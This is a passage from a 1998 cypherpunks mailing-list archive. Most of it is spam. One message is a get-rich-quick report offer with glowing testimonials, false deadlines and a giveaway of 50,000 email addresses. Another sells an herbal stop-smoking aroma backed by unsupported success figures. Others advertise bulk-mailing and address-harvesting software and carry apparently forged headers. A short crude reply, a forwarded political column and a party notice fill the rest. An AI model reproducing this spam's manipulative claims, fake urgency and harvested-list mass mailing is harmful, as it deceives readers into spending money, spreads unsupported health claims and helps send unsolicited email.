I received your report and free bonuses last Saturday and wanted to
congratulate you on a job well done. I read through your report "How 
To Profit From The Internet" and I'm very impressed.  I have bought 
other books and manuals about  Online Marketing, Direct Marketing, 
E-mail, Mail Order, etc. Yours is the only one that explains the
subject  in an easy to understand language.  I finally found the 
secrets I've been looking for. 

Once again, Great Job!

Sincerely,
John Strand - Satisfied Customer



My father has always told me, "remember, Michele, there is no free 
lunch in life. You get out of life what you put into it."  Through trial 
and error and a somewhat slow frustrating start, I purchased your 
report and finally figured out how to start a very profitable business
from my home. Your report is great, you give the average person 
the tools and secrets to succeed.  I know my dad is very proud of 
me now.

I can't thank you enough =)

Michele B from Oregon


Good Morning,

I hope this finds you well.  I received your program yesterday after-
noon and read it cover to cover.  You have put together a very 
valuable resource indeed.  I have finally found the program that 
tells all!  Your program has given me the tools I need to succeed.  

Your the best, I'm making your manual into my internet Bible!!  
Thanks a million!

Best Regards,
Elaine Forester


This is a wonderful opportunity,  you won't find too many people 
that will give away ALL of their secrets!!  The majority of the rich 
people today have copied what someone else is or has been doing.  
That is what we are offering you now--a chance to copy our success!! 
 It is very easy and WE ARE FOR REAL!

Here's a little more incentive to check this out!

We will send you:

 **** FREE $400 Professional E-mail Software ****
 **** FREE $200 Check by phone, fax, E-mail Software ****
 **** FREE $10 Calling Card ****
 
----PLUS----

We will send you a list of over 100 major search engines ready to
surf on the Internet or to place a free link to your web page.   Also, 
you will receive a list of 98 of the best inexpensive newspapers to 
advertise in (U.S. orders only).  The list is complete with papers name, 
city, phone number, circulation and frequency  (Daily or Weekly).  

We will also include five free BONUS reports that include these topics:
 How to Protect your PC from Viruses
 How to get 300+ Quality Prospect to E-mail you Weekly
 Tips and Secrets to Advertising with the major Online Services
 What's wrong with the World Wide Web 
 Tax Advantages for the Home Business Owner.  
You will find that these five reports by themselves are worth 
thousands of dollars to you.

We will also give you a secret list of over 1500 of the best Web sites 
where you can place a FREE advertisement.  This is a list we use 
every day to run our business and we are giving it to you!  Imagine 
what a great offering we are giving you for FREE! 

And we're not through, if you order RIGHT NOW,  we will give you 
15 FREE "How to Reports" that you are free to market and sell on the 
Internet or through mail order for $15-30 each.  They are 45-60 
informational packed pages each.  A great way to start your own 
Net based business!  The topics are;

            1)   Earn Extra Dollars with a Home Based Answering Machine 
            2)   How to Buy a Car with Bad Credit 
            3)   How to Make Thousands of Dollars Winning Contests 
            4)   U.S. Government Auction Sales 
            5)   An Insider's Guide to Finding and Obtaining Grant Money 
            6)   Home Based Business for Fun and Profit 
            7)   How to Get a Job Fast 
            8)   How to Make Money Without Leaving Your House 
            9)   How to Turn the Hobby of Photography into Thousands 
           10)   Making Money at Garage Sales, Swap Meets, and Flea Markets 
           11)   How to Get Paid for Watching TV 
           12)   Getting Your Start in Theater, Television, and Movies 
           13)   Wills or Trusts?  The Case for Living Trusts 
           14)   How To Find Work with the Federal Government 
           15)   How to Write Almost Anything and Get Paid for it!

         
        50,000 EMAIL ADDRESSES FOR FREE
That's right, we will give you our BEST private list of 50,000 email addresses.  
This list of addresses has been put through our remove and undeliverable lists 
so that it is fresh and responsive.  We are constantly adding and taking 
addresses out of it.  It is absolutely the best 50,000 email addresses you will 
ever get your hands on, BAR NONE!
(please note:  we are only giving this bonus to the first 50 people, so Don't Wait!!!)

Are we nuts?

No, it just shows how confident we are that you'll be delighted with 
the information you'll have...just like the others who are already using 
the information and making money.  You will be surprised how quickly 
you can be making money on the Internet!   
 
So you are probably thinking to yourself, this is AWESOME, but how much?  
$249.95,  $199.95 maybe even $99.95?  You may have seen other companies 
marketing "How To" information on the Internet and charging these prices. 
People are actually buying these packages at these prices.  Why?  People 
want to know how to market a product or service the "Right" way on the 
Internet.  "How to Profit from the Internet" could easily sell for any of the 
above prices.  However, we feel that we would rather help those who 
may not have the ability to pay such a price in order to be successful.  
That is why we are offering "How to Profit from the Internet" for the 
unbelievable low price of $39.95.  

That's right, that was not a typo...$39.95,  and all the BONUSES worth over 
$1,000 are FREE!!!!

 
Still skeptical???  Lets put that to rest right now.  We will make this 
completely risk free for you.  If you are not 100% satisfied with the
information you receive, and believe that you cannot use it to start a
successful business or increase your current business profits, return it
within 10 days and we will refund your money.  No questions asked!!  


We have sold this package at much higher prices in the recent past and will be
forced to raise my prices in the very near future. One of the things
you will learn in my manual is to constantly test your market.  I am
currently in the price testing phase of this marketing campaign.
On March 31st, 1998 we will be raising the price of this package
back up to $79.95 and eventually up to $129.95 to test the upscale market.
If you act quickly, you have the opportunity to get these materials today
for the unbelievable low price of $39.95.

So, if you are seriously interested in learning how to acquire wealth 
by being online, ACT NOW!!  This won't last for long!

Print out this form and mail it to the address below, with your $39.95 
cash, check, money order or credit card information to:


Natural Instincts
4676 Commercial St. SE Suite 201 
Salem, Oregon 97302   

Thank you =) 

****Please print out the order form and mail it along with your payment****

*****************************************************************************************
                                  ORDER FORM
*****************************************************************************************

NAME______________________________________________________

ADDRESS___________________________________________________

CITY_______________________ STATE__________ ZIP__________

Website Address____________________________________________

Deliver "How to Profit from the Internet" to the following email address:

E-MAIL ADDRESS____________________________________________
(please note, all orders must include an email address incase we encounter a 
problem with processing.  The 50,000 email addresses will be sent to you by email)

Area code and Phone number:

Day time __________________  Evening:  ________________________

[ ] If you prefer to have the report on disk, please check here.  Please 
include an additional $3.00 for shipping and handling, thank you.
(If you reside outside the United States, please include $2.00 extra)

Please check one of the following:

[ ]  I'm ordering within 3 days, please send my FREE software, $10.00 
calling card, 15 How to Reports, "How To Profit From The Internet" 
and FREE BONUSES including 50,000 email addresses for the 
unbelievably low price of $39.95 today.

[ ]  I'm not ordering within the first 3 days of receiving this letter, so I 
agree to pay $39.95 for "How to Profit from the Internet" by itself, 
less the bonus package.

[Internal code 138316] This code must be on order form to be processed!!!

Payment Method:                             

[ ] Check 

[ ] Cash

[ ] Money Order

[ ] Credit Card, please make sure to include the mailing address above!
          
             [  ] Visa       [  ]  MasterCard

Name of Credit Card: _____________________________

Name as it appears on Card: _________________________________

Card Number: __________________________________

Expiration Date: _____ / _____

Signature of Card Holder: _________________________.

************************************************************************************
"In mail-order work, anyone with imagination, determination, and a
willingness to study and experiment may have very little difficulty
getting started. A number of the most successful one-man operations
obtain an income as high as $40,000 to $100,000 a year."

                - U.S. Department of Commerce
************************************************************************************                                                                          
THE MARKET IS HERE - TODAY!   TAKE ADVANTAGE OF IT!!!!!
After you receive your report, I'll answer any questions time permits 
via email.  I'm looking forward to helping you succeed!









From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Toto" <toto@sk.sympatico.ca>
Date: Tue, 31 Mar 1998 20:37:47 -0800 (PST)
To: "Lance Cottrell" <loki@infonex.com>
Subject: Re: AUP
Message-ID: <000c01bd5d38$68213380$7679a58e@uymfdlvk>
MIME-Version: 1.0
Content-Type: text/plain



-----Original Message-----
From: Lance Cottrell <loki@infonex.com>


>Sadly our lawyer suggests that physically dismembering abusers is
>inappropriate from a corporate point of view.  ;)


Pussies...






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Toto" <toto@sk.sympatico.ca>
Date: Tue, 31 Mar 1998 21:24:30 -0800 (PST)
To: "Vin Suprynowicz" <Vin_Suprynowicz@lvrj.com>
Subject: Repeat Offenders / Re: March 1 column - child abuse trials
Message-ID: <005f01bd5d3e$ece30b60$7679a58e@uymfdlvk>
MIME-Version: 1.0
Content-Type: text/plain


Now, if only we could get a conviction...

-----Original Message-----
>    FROM MOUNTAIN MEDIA
>    FOR IMMEDIATE RELEASE DATED MARCH 1, 1998
>    THE LIBERTARIAN, By Vin Suprynowicz
>    Where are they now?


>  Only last week did a three-judge panel of the 11th Circuit Court of
>Appeals, in a unanimous ruling, overturn the conviction of Miami police
>officer Grant Snowden, sentenced in 1986 to five life terms on charges he
>had committed sexual crimes against small children.

...
>  If juries are willing to embrace "professional" testimony that small
>children who make fantastic, rambling accusations are telling the truth
>"99.5 percent of the time," have we really come so far from the days of the
>Salem witchcraft trials ... which ended, instructively enough, when 23
>Massachusetts juries in a row finally refused to convict?
...

>  What about those prosecutors, by the way? What ever did become of the
>ambitious Dade County State Attorney whose office prosecuted Officer
>Snowden -- now ordered to be released "unless the state affords him a
>speedy new trial"?
>
>  Why, her name was Janet Reno, and she was elevated in 1993 to the
>position of attorney general of the United States, where she immediately
>oversaw the "protection" of the children of the Mount Carmel religious
>community in Waco, Texas, by federal agents who trapped them in their
>church by using armored vehicles to knock down walls and escape staircases,
>injected the premises with poison gas, and in the process started a fatal
>conflagration by knocking over kerosene lanterns and space heaters, all
>while fellow G-men poured "suppressive" automatic weapons fire into the
>structure to stop anyone from escaping or resisting.
>
>  (See it for yourself, as filmed by federal government cameras: Order the
>video "Waco: The Terms of Engagement," now nominated for an Academy Award
>as best documentary, at $25 by dialing 1-800-771-2147, ext. 19.)
>
>Vin Suprynowicz is the assistant editorial page editor of the Las Vegas
>Review-Journal. Readers may contact him via e-mail at vin@lvrj.com. The web
>site for the Suprynowicz column is at http://www.nguworld.com/vindex/. The
>column is syndicated in the United States and Canada via Mountain Media
>Syndications, P.O. Box 4422, Las Vegas Nev. 89127.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: 40264587@usa.net
Date: Sun, 1 Mar 1998 08:18:47 -0800 (PST)
To: URFRIEND@myplace.com
Subject: STOP SMOKING ...SECRET!
Message-ID: <>
MIME-Version: 1.0
Content-Type: text/plain


IF YOU SMOKE , PLEASE READ THIS CAREFULLY!  YOU TOO 
CAN STOP SMOKING EASILY WITH A NEW CHINESE SMOKER'S 
HERBAL AROMA THAT IS NOW AVAILABLE IN THE UNITED
STATES.

This amazing new product has successfully helped  at least 90% of 
those who use it consistently.

"I lost the desire for smoking almost immediately.  When I occasionally
would smoke, the cigarette had no taste and was not fun to smoke.  
After three days, whenever I wanted to smoke I would smell the bottle 
and lose the desire."
Robert F.- Newmanstown, PA.

"I smoked for 15 years.  This product completely took away my desire to
smoke. two days, I cut my smoking in half.  Then I stopped completely! 
 I have never used a product with such power .  I recommend it to any 
smoker who wants to quit."
Michele G., Fairfield, Iowa

   The majority of people who smoke cigarettes would like to quit. Are
you one of these people, or are you too disheartened by the cost of other
failures?

The patch and the nicotine gums are of a certain time limit and can be
very costly.  They also add to the nicotine in your bloodstream.  This new
product is a one time purchase for the majority of people. Think of what it
costs to use the other alternatives.

 This purely natural product acts like nicotine in the bloodstream.  The
small bottle fits easily in your pocket and your purse.   After merely
inhaling  the fragrance  4-10 times a day for about one minute,  the effect
builds day by day.  Usually after 3 or 4 days, your body feels like it already 
has consumed 15 cigarettes.  It is a simple process and can be used in all 
situations where you are forbidden to smoke!  This, for many people relieves 
much stress in the work and social world.

"I was going crazy in meetings, in airplanes, and fancy restaurants.
Now I carry my small bottle wherever I go and can use it everywhere.  It has
helped immensely. "
John M., Boulder, Co.

"I was not ready to quit.  I started to use the product several times a
day and loved the minty aroma.  I felt better immediately.  I cut back from
almost a pack a day to  about 6. " 
 Sandra J.  Denver, Co.

   In each study done in China, over 90% of the people who used the
product consistently, were able to either stop  entirely or cut back to only 2-3
cigarettes a day in 2 weeks.  After 2 months,  80% had quit entirely and
the rest were smoking only 5 a day.

   You too can quit easily with this new product.  It is so simple and
easy to use.

   THIS UNIQUE PRODUCT IS NOT AVAILABLE IN STORES.
   SMOKER'S HERBAL AROMA IS AVAILABLE FOR ONLY $35.00

 You can order this amazing product by calling (303)494-8455 or by fax
(303)499-7398, or email delray4@juno.com, or by mail to Delray Co., 4335

Butler Circle,  Boulder, Co. 80303.  Please include the following
information:

NAME:_________________________________________________________
ADDRESS:_____________________________________________________
CITY;_______________________________________________________
STATE;-____________    ZIP:____________ PHONE:_______________________
PAYMENT BY____VISA      ____MASTERCARD     ____CHECK
CARD NUMBER_____________________________________
EXP. DATE______________________________
QTY.____@ $35.00
SUB-TOTAL_______________
SHIPPING  $3.50 (add $1.00 for each additional bottle)______________
TAX (for Colorado residents only add $2.10 per bottle)____________
TOTAL :_________________

ORDERS ARE SHIPPED WITHIN 3 DAYS  BY PRIORITY MAIL






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: 54689590@hotmail.com
Date: Sun, 1 Mar 1998 21:22:47 -0800 (PST)
To: URFRIEND@myplace.com
Subject: FREE SOFTWARE !!!
Message-ID: <>
MIME-Version: 1.0
Content-Type: text/plain


FREE SOFTWARE! BULK EMAIL TOOLS!

ALL YOU NEED FOR SENDING BULK E-MAIL & PROMOTING:

Hi my name is Jennifer, 

I have been searching for promotional tips for all my down line members.  Mostly, this centered
around ways to promote using bulk email responsibly.  I have finally come upon a site and 
service that provides all we need:

http://www.ezine-info.com  USE ID# 1363

Keep trying if sites are busy-it's worth it.

Check it out for yourself:

Bulk e-mail software:  E-MAIL BLASTER PLATINUM

FREE E-MAIL addresses to download-lots of 'em-FRESH 100,000's

All  sorts  of  other  tips  and  Free  software

Learn how to bulk e-mail responsibly

If  you  sign-up,  please  use  my  ID#   1363

It  is  the  best  I  have  found.

Thank you for your time.  

If you wish to be removed from *this* mailing list, please hit reply and type "REMOVE" in 
the SUBJECT field ( not the body ). Our servers will automatically remove you from
our list within 24hrs!  THANKYOU





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sandy Sandfort <sandfort@crl.com>
Date: Mon, 2 Mar 1998 23:11:04 -0800 (PST)
To: cypherpunks-announce@toad.com
Subject: COSTUME BALL
Message-ID: <Pine.SUN.3.91.980302183837.5656D-100000@crl.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                          SANDY SANDFORT
 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

Cypherpunks,

It's that time again.  My next gala costume ball is March 14th.
You are invited.  The full invitation is at:

		http://www.c2.net/~sandy/98mar.htm

Please read the invitation carefully.  The devil is always in the
details.

This notice is being sent via the Cypherpunks Announce List.  If
you don't want to be on the list, DON'T e-mail me.  I can't get
you off the list.  To get off the list, send e-mail to:

		majordomo@toad.com

As the first line of the message, write:

		unsubscribe cypherpunks-announce

Hope to see you on the 14th.

Regards,


 S a n d y

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: 96866514@mci.net
Date: Fri, 6 Mar 1998 21:37:49 -0800 (PST)
To: Members@aol.com
Subject: Expose your Website or Business To Millions With Stealth !!!!
Message-ID: <>
MIME-Version: 1.0
Content-Type: text/plain


<HTML><PRE><BODY BGCOLOR="#ffffff">
</P><P ALIGN=CENTER><FONT  COLOR="#00ffff" SIZE=6><B>Bulk Email Programs<FONT  COLOR="#00ffff" SIZE=5>
</FONT><FONT  COLOR="#ff0000" SIZE=4>6 Major Programs On ONE CD ONLY $600.00 !!!!!!!

</FONT><FONT  COLOR="#0000ff" SIZE=4>All these programs together will cost of over $1600.00 at retail price and are available until 02/28/98 for this price.</FONT><FONT  COLOR="#ff0000" SIZE=4>
</P><P ALIGN=LEFT>
Please keep in mind that none of these programs are demos they are full version programs.
</P><P ALIGN=CENTER>
</P><P ALIGN=LEFT></FONT><FONT  COLOR="#00ffff" SIZE=4>STEALTH MASS MAILER (FULL VERSION)
</FONT><FONT  COLOR="#8080ff" SIZE=3>SEND BULK EMAIL AT THE RATE OF 200,000/HOUR ( Retail $399.00 )</FONT><FONT  COLOR="#00ffff" SIZE=4>

TURBO EMAIL LIST MANAGER
</FONT><FONT  COLOR="#8080ff" SIZE=3>POWERFUL EMAIL DATABASE LIST MANAGER  (Retail 299.00)</FONT><FONT  COLOR="#00ffff" SIZE=4>

HURRICANE EMAIL ADDRESS COLLECTOR
</FONT><FONT  COLOR="#8080ff" SIZE=3>COLLECTS TARGETED EMAIL ADDRESSES FROM WEB SITES (Retail $295.00 )</FONT><FONT  COLOR="#00ffff" SIZE=4>

GEO SNAKE
</FONT><FONT  COLOR="#8080ff" SIZE=3>COLLECTS TARGETED EMAIL ADDRESSES BASED ON CITY/STATE
(Retail $199.00)</FONT><FONT  COLOR="#00ffff" SIZE=4>

NEWS SLEUTH
</FONT><FONT  COLOR="#8080ff" SIZE=3>COLLECTS TARGETED EMAIL ADDRESSES FROM NEWSGROUP POSTS 
(Retail $295.00 )</FONT><FONT  COLOR="#00ffff" SIZE=4>


EMAIL PRO
</FONT><FONT  COLOR="#8080ff" SIZE=3>EMAIL ADDRESS LIST MANAGER ( Retail $195.00 )

</P><P ALIGN=CENTER></FONT><FONT  COLOR="#ff0000" SIZE=3>YOU GET ALL 6 PROGRAMS ON CD FOR ONLY $600

</P><P ALIGN=LEFT></FONT><FONT  COLOR="#00ffff" SIZE=3>TO ORDER PLEASE CALL (213)757-9032 FOR COMPLETE ORDERING DETAILS.</FONT><FONT  COLOR="#000000" SIZE=3></B>epartment at (213) 757-9032 <B>For orders for next day delivery please add $15.00 to your order and priority mail please add $3.00 to your order.</B>

<FONT  COLOR="#ffff00" SIZE=3>I<FONT  COLOR="#ffff00" SIZE=4>f you are interested in becomming a vendor for our software please email us at Infosupport@juno.com for complete details.</FONT><FONT  COLOR="#000000" SIZE=3>


 Remove Here 



<FONT  COLOR="#0f0f0f" BACK="#fffffe" SIZE=3><B>
----------------------- Headers --------------------------------
Return-Path: <bob@multi38.netcomi.com>
Received: from  relay17.mail.aol.com (relay17.mail.aol.com [172.31.106.71]) by air15.mail.aol.com (v37.8) with SMTP; Sat, 10 Jan 1998 18:46:34 -0500
Received: from relay17.mx.aol.com (sdn-ts-043txfwoRP05.dialsprint.net [206.133.153.120])
	  by relay17.mail.aol.com (8.8.5/8.8.5/AOL-4.0.0)
	  with SMTP id SAA00988;
	  Sat, 10 Jan 1998 18:45:09 -0500 (EST)
From: XstudmanXX@aol.com
Received: from x2see4uooh@aol.com by x2see4uooh@aol.com (8.8.5/8.6.5) with SMTP id GAA04408 for <x2see4uooh@aol.com>; Sat, 10 Jan 1998 18:49:17 -0600 (EST)
To: x2see4uooh@aol.com
Message-ID: <299703123654.GGA18155@blahblahblah.com>
Date: Sat, 10 Jan 98 18:49:17 EST
Subject:#1 Bulk Email Software(Advertise To Millions Free)
Reply-To: x2see4uooh@aol.com
X-PMFLAGS: 32110291 3
X-UIDL: 0132569874a56kla5x357xex534a5s6d
Comments: Authenticated sender is <x2see4uooh@aol.com>
Subject: #Advertise Your Business To Millions By Email With R.A.F.)
 






----------------------- Headers --------------------------------
Return-Path: <bob@multi38.netcomi.com>
Received: from candy.micro-net.net (candy.micro-net.net [207.182.64.2])
	  by mrin45.mail.aol.com (8.8.5/8.8.5/AOL-4.0.0)
	  with ESMTP id BAA05102 for <roargi@aol.com>;
	  Sat, 11 Oct 1997 01:40:12 -0400 (EDT)
Received: from micro-net.com (ip130.columbus4.oh.pub-ip.psi.net [38.27.73.130])
	by candy.micro-net.net (8.8.7/8.8.6/bspm1.13+rchk1.13) with SMTP id BAA05191
	for <roargi@aol.com>; Sat, 11 Oct 1997 01:40:02 -0400 (EDT)
Date: Sat, 11 Oct 1997 01:40:02 -0400 (EDT)
From: timothy drobnick <conserve@micro-net.com>
To: roargi@aol.com
Subject: I saw your AOL classified ad,
Reply-to: conserve@micro-net.com
Comments: Authenticated sender is <conserve@micro-net.com>
Received: from micro-net.com (micro-net.com [000.000.000.000]) by micro-net.com (0.0.0./0.0.0.) with SMTP id AAA000000 for <conserve@micro-net.com>; Sat, 11 Oct 1997 1:34:14 -0500 (EST)
Message-Id: 0000000000.AAA000@micro-net.com
X-UIDL: 41489129262628956441837275925415  
Subject: #1Advertise Your Business To Millions By Email With R.A.F)















----------------------- Headers --------------------------------
Return-Path: <bob@multi38.netcomi.com>
Received: from candy.micro-net.net (candy.micro-net.net [207.182.64.2])
	  by mrin45.mail.aol.com (8.8.5/8.8.5/AOL-4.0.0)
	  with ESMTP id BAA05102 for <tresd@compusreve>;
	  Sat, 11 Oct 1997 01:40:12 -0400 (EDT)
Received: from micro-net.com (ip130.columbus4.oh.pub-ip.psi.net [38.27.68.130])
	by candy.micro-net.net (8.8.7/8.8.6/bspm1.13+rchk1.13) with SMTP id BAA05191
	for <roargi@aol.com>; Sat, 11 Oct 1997 01:40:02 -0400 (EDT)
From: timothy drobnick <conserve@micro-net.com>
To: roargi@aol.com
Subject:#1 Bulk Email Software(Advertise To Millions Free)
Comments: Authenticated sender is <conserve@micro-net.com>
Received: from micro-net.com (micro-net.com [000.000.000.000]) by micro-net.com (0.0.0./0.0.0.) with SMTP id AAA000000 for <conserve@micro-net.com>; Sat, 11 Oct 1997 1:34:14 -0500 (EST)
Message-Id: 0000000000.AAA000@micro-net.com
X-UIDL: 41489129262628956441837275925415           
Subject: #1 Advertise Your Business To Millions By Email With R.A.F)                                                       
</P><P ALIGN=CENTER></FONT></FONT><FONT  COLOR="#000000" BACK="#FFFFFF" SIZE=3></B>
                           
  
</P><P ALIGN=LEFT>

                                           




<FONT  COLOR="#000000" BACK="#fffffe" SIZE=3>

----------------------- Headers --------------------------------
Return-Path: <bob@multi38.netcomi.com>
Received: from  relay03a.mail.aol.com (relay03a.mail.aol.com [172.31.160.3]) by air03a.mail.aol.com (v37.8) with SMTP; Sat, 17 Jan 1998 02:49:56 -0500
Received: from multi38.netcomi.com (multi38.netcomi.com [204.58.155.238])
	  by relay03a.mail.aol.com (8.8.5/8.8.5/AOL-4.0.0)
	  with ESMTP id CAA21650;
	  Sat, 17 Jan 1998 02:49:54 -0500 (EST)
Received: from SOFTWINU (ts1p5.vh.net [207.204.249.25]) by multi38.netcomi.com (8.8.7/8.7.3) with SMTP id BAA04667; Sat, 17 Jan 1998 01:49:50 -0600
Message-Id: <199801170749.BAA04667@multi38.netcomi.com>
From: 1112_man@thecard.com
Date: Sat, 17 Jan 1998 02:47:23 PST
Subject: #1 Advertise Your Business To Millions By Email With R.A.F)<FONT  COLOR="#0f0f0f" SIZE=3>

</PRE></HTML>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: 55459456@msn.com
Date: Sat, 7 Mar 1998 03:52:03 -0800 (PST)
To: Members@aol.com
Subject: Advertise Your Business To MIllions With Direct Email Marketing !!!
Message-ID: <>
MIME-Version: 1.0
Content-Type: text/plain


<HTML><PRE>
</P><P ALIGN=CENTER><FONT  COLOR="#00ffff" SIZE=6><B>Bulk Email Programs<FONT  COLOR="#00ffff" SIZE=5>
</FONT><FONT  COLOR="#ff0000" SIZE=4>6 Major Programs On ONE CD ONLY $600.00 !!!!!!!

</FONT><FONT  COLOR="#0000ff" SIZE=4>All these programs together will cost of over $1600.00 at retail price and are available until 02/28/98 for this price.</FONT><FONT  COLOR="#ff0000" SIZE=4>
</P><P ALIGN=LEFT>
Please keep in mind that none of these programs are demos they are full version programs.
</P><P ALIGN=CENTER>
</P><P ALIGN=LEFT></FONT><FONT  COLOR="#00ffff" SIZE=4>STEALTH MASS MAILER (FULL VERSION)
</FONT><FONT  COLOR="#8080ff" SIZE=3>SEND BULK EMAIL AT THE RATE OF 200,000/HOUR ( Retail $399.00 )</FONT><FONT  COLOR="#00ffff" SIZE=4>

TURBO EMAIL LIST MANAGER
</FONT><FONT  COLOR="#8080ff" SIZE=3>POWERFUL EMAIL DATABASE LIST MANAGER  (Retail 299.00)</FONT><FONT  COLOR="#00ffff" SIZE=4>

HURRICANE EMAIL ADDRESS COLLECTOR
</FONT><FONT  COLOR="#8080ff" SIZE=3>COLLECTS TARGETED EMAIL ADDRESSES FROM WEB SITES (Retail $295.00 )</FONT><FONT  COLOR="#00ffff" SIZE=4>

GEO SNAKE
</FONT><FONT  COLOR="#8080ff" SIZE=3>COLLECTS TARGETED EMAIL ADDRESSES BASED ON CITY/STATE
(Retail $199.00)</FONT><FONT  COLOR="#00ffff" SIZE=4>

NEWS SLEUTH
</FONT><FONT  COLOR="#8080ff" SIZE=3>COLLECTS TARGETED EMAIL ADDRESSES FROM NEWSGROUP POSTS 
(Retail $295.00 )</FONT><FONT  COLOR="#00ffff" SIZE=4>


EMAIL PRO
</FONT><FONT  COLOR="#8080ff" SIZE=3>EMAIL ADDRESS LIST MANAGER ( Retail $195.00 )

</P><P ALIGN=CENTER></FONT><FONT  COLOR="#ff0000" SIZE=3>YOU GET ALL 6 PROGRAMS ON CD FOR ONLY $600

</P><P ALIGN=LEFT></FONT><FONT  COLOR="#00ffff" SIZE=3>TO ORDER PLEASE CALL (213)757-9032 FOR COMPLETE ORDERING DETAILS.</FONT><FONT  COLOR="#000000" SIZE=3></B>epartment at (213) 757-9032 <B>For orders for next day delivery please add $15.00 to your order and priority mail please add $3.00 to your order.</B>

<FONT  COLOR="#ffff00" SIZE=3>I<FONT  COLOR="#ffff00" SIZE=4>f you are interested in becomming a vendor for our software please email us at Support26@juno.com for complete details.</FONT><FONT  COLOR="#000000" SIZE=3>


 Remove Here 



<FONT  COLOR="#0f0f0f" BACK="#fffffe" SIZE=3><B>
----------------------- Headers --------------------------------
Return-Path: <bob@multi38.netcomi.com>
Received: from  relay17.mail.aol.com (relay17.mail.aol.com [172.31.106.71]) by air15.mail.aol.com (v37.8) with SMTP; Sat, 10 Jan 1998 18:46:34 -0500
Received: from relay17.mx.aol.com (sdn-ts-043txfwoRP05.dialsprint.net [206.133.153.120])
	  by relay17.mail.aol.com (8.8.5/8.8.5/AOL-4.0.0)
	  with SMTP id SAA00988;
	  Sat, 10 Jan 1998 18:45:09 -0500 (EST)
From: XstudmanXX@aol.com
Received: from x2see4uooh@aol.com by x2see4uooh@aol.com (8.8.5/8.6.5) with SMTP id GAA04408 for <x2see4uooh@aol.com>; Sat, 10 Jan 1998 18:49:17 -0600 (EST)
To: x2see4uooh@aol.com
Message-ID: <299703123654.GGA18155@blahblahblah.com>
Date: Sat, 10 Jan 98 18:49:17 EST
Subject:#1 Bulk Email Software(Advertise To Millions Free)
Reply-To: x2see4uooh@aol.com
X-PMFLAGS: 32110291 3
X-UIDL: 0132569874a56kla5x357xex534a5s6d
Comments: Authenticated sender is <x2see4uooh@aol.com>
Subject: #Advertise Your Business To Millions By Email With R.A.F.)
 






----------------------- Headers --------------------------------
Return-Path: <bob@multi38.netcomi.com>
Received: from candy.micro-net.net (candy.micro-net.net [207.182.64.2])
	  by mrin45.mail.aol.com (8.8.5/8.8.5/AOL-4.0.0)
	  with ESMTP id BAA05102 for <roargi@aol.com>;
	  Sat, 11 Oct 1997 01:40:12 -0400 (EDT)
Received: from micro-net.com (ip130.columbus4.oh.pub-ip.psi.net [38.27.73.130])
	by candy.micro-net.net (8.8.7/8.8.6/bspm1.13+rchk1.13) with SMTP id BAA05191
	for <roargi@aol.com>; Sat, 11 Oct 1997 01:40:02 -0400 (EDT)
Date: Sat, 11 Oct 1997 01:40:02 -0400 (EDT)
From: timothy drobnick <conserve@micro-net.com>
To: roargi@aol.com
Subject: I saw your AOL classified ad,
Reply-to: conserve@micro-net.com
Comments: Authenticated sender is <conserve@micro-net.com>
Received: from micro-net.com (micro-net.com [000.000.000.000]) by micro-net.com (0.0.0./0.0.0.) with SMTP id AAA000000 for <conserve@micro-net.com>; Sat, 11 Oct 1997 1:34:14 -0500 (EST)
Message-Id: 0000000000.AAA000@micro-net.com
X-UIDL: 41489129262628956441837275925415  
Subject: #1Advertise Your Business To Millions By Email With R.A.F)















----------------------- Headers --------------------------------
Return-Path: <bob@multi38.netcomi.com>
Received: from candy.micro-net.net (candy.micro-net.net [207.182.64.2])
	  by mrin45.mail.aol.com (8.8.5/8.8.5/AOL-4.0.0)
	  with ESMTP id BAA05102 for <tresd@compusreve>;
	  Sat, 11 Oct 1997 01:40:12 -0400 (EDT)
Received: from micro-net.com (ip130.columbus4.oh.pub-ip.psi.net [38.27.68.130])
	by candy.micro-net.net (8.8.7/8.8.6/bspm1.13+rchk1.13) with SMTP id BAA05191
	for <roargi@aol.com>; Sat, 11 Oct 1997 01:40:02 -0400 (EDT)
From: timothy drobnick <conserve@micro-net.com>
To: roargi@aol.com
Subject:#1 Bulk Email Software(Advertise To Millions Free)
Comments: Authenticated sender is <conserve@micro-net.com>
Received: from micro-net.com (micro-net.com [000.000.000.000]) by micro-net.com (0.0.0./0.0.0.) with SMTP id AAA000000 for <conserve@micro-net.com>; Sat, 11 Oct 1997 1:34:14 -0500 (EST)
Message-Id: 0000000000.AAA000@micro-net.com
X-UIDL: 41489129262628956441837275925415           
Subject: #1 Advertise Your Business To Millions By Email With R.A.F)                                                       
</P><P ALIGN=CENTER></FONT></FONT><FONT  COLOR="#000000" BACK="#FFFFFF" SIZE=3></B>
                           
  
</P><P ALIGN=LEFT>

                                           




<FONT  COLOR="#000000" BACK="#fffffe" SIZE=3>

----------------------- Headers --------------------------------
Return-Path: <bob@multi38.netcomi.com>
Received: from  relay03a.mail.aol.com (relay03a.mail.aol.com [172.31.160.3]) by air03a.mail.aol.com (v37.8) with SMTP; Sat, 17 Jan 1998 02:49:56 -0500
Received: from multi38.netcomi.com (multi38.netcomi.com [204.58.155.238])
	  by relay03a.mail.aol.com (8.8.5/8.8.5/AOL-4.0.0)
	  with ESMTP id CAA21650;
	  Sat, 17 Jan 1998 02:49:54 -0500 (EST)
Received: from SOFTWINU (ts1p5.vh.net [207.204.249.25]) by multi38.netcomi.com (8.8.7/8.7.3) with SMTP id BAA04667; Sat, 17 Jan 1998 01:49:50 -0600
Message-Id: <199801170749.BAA04667@multi38.netcomi.com>
From: 1112_man@thecard.com
Date: Sat, 17 Jan 1998 02:47:23 PST
Subject: #1 Advertise Your Business To Millions By Email With R.A.F)<FONT  COLOR="#0f0f0f" SIZE=3>

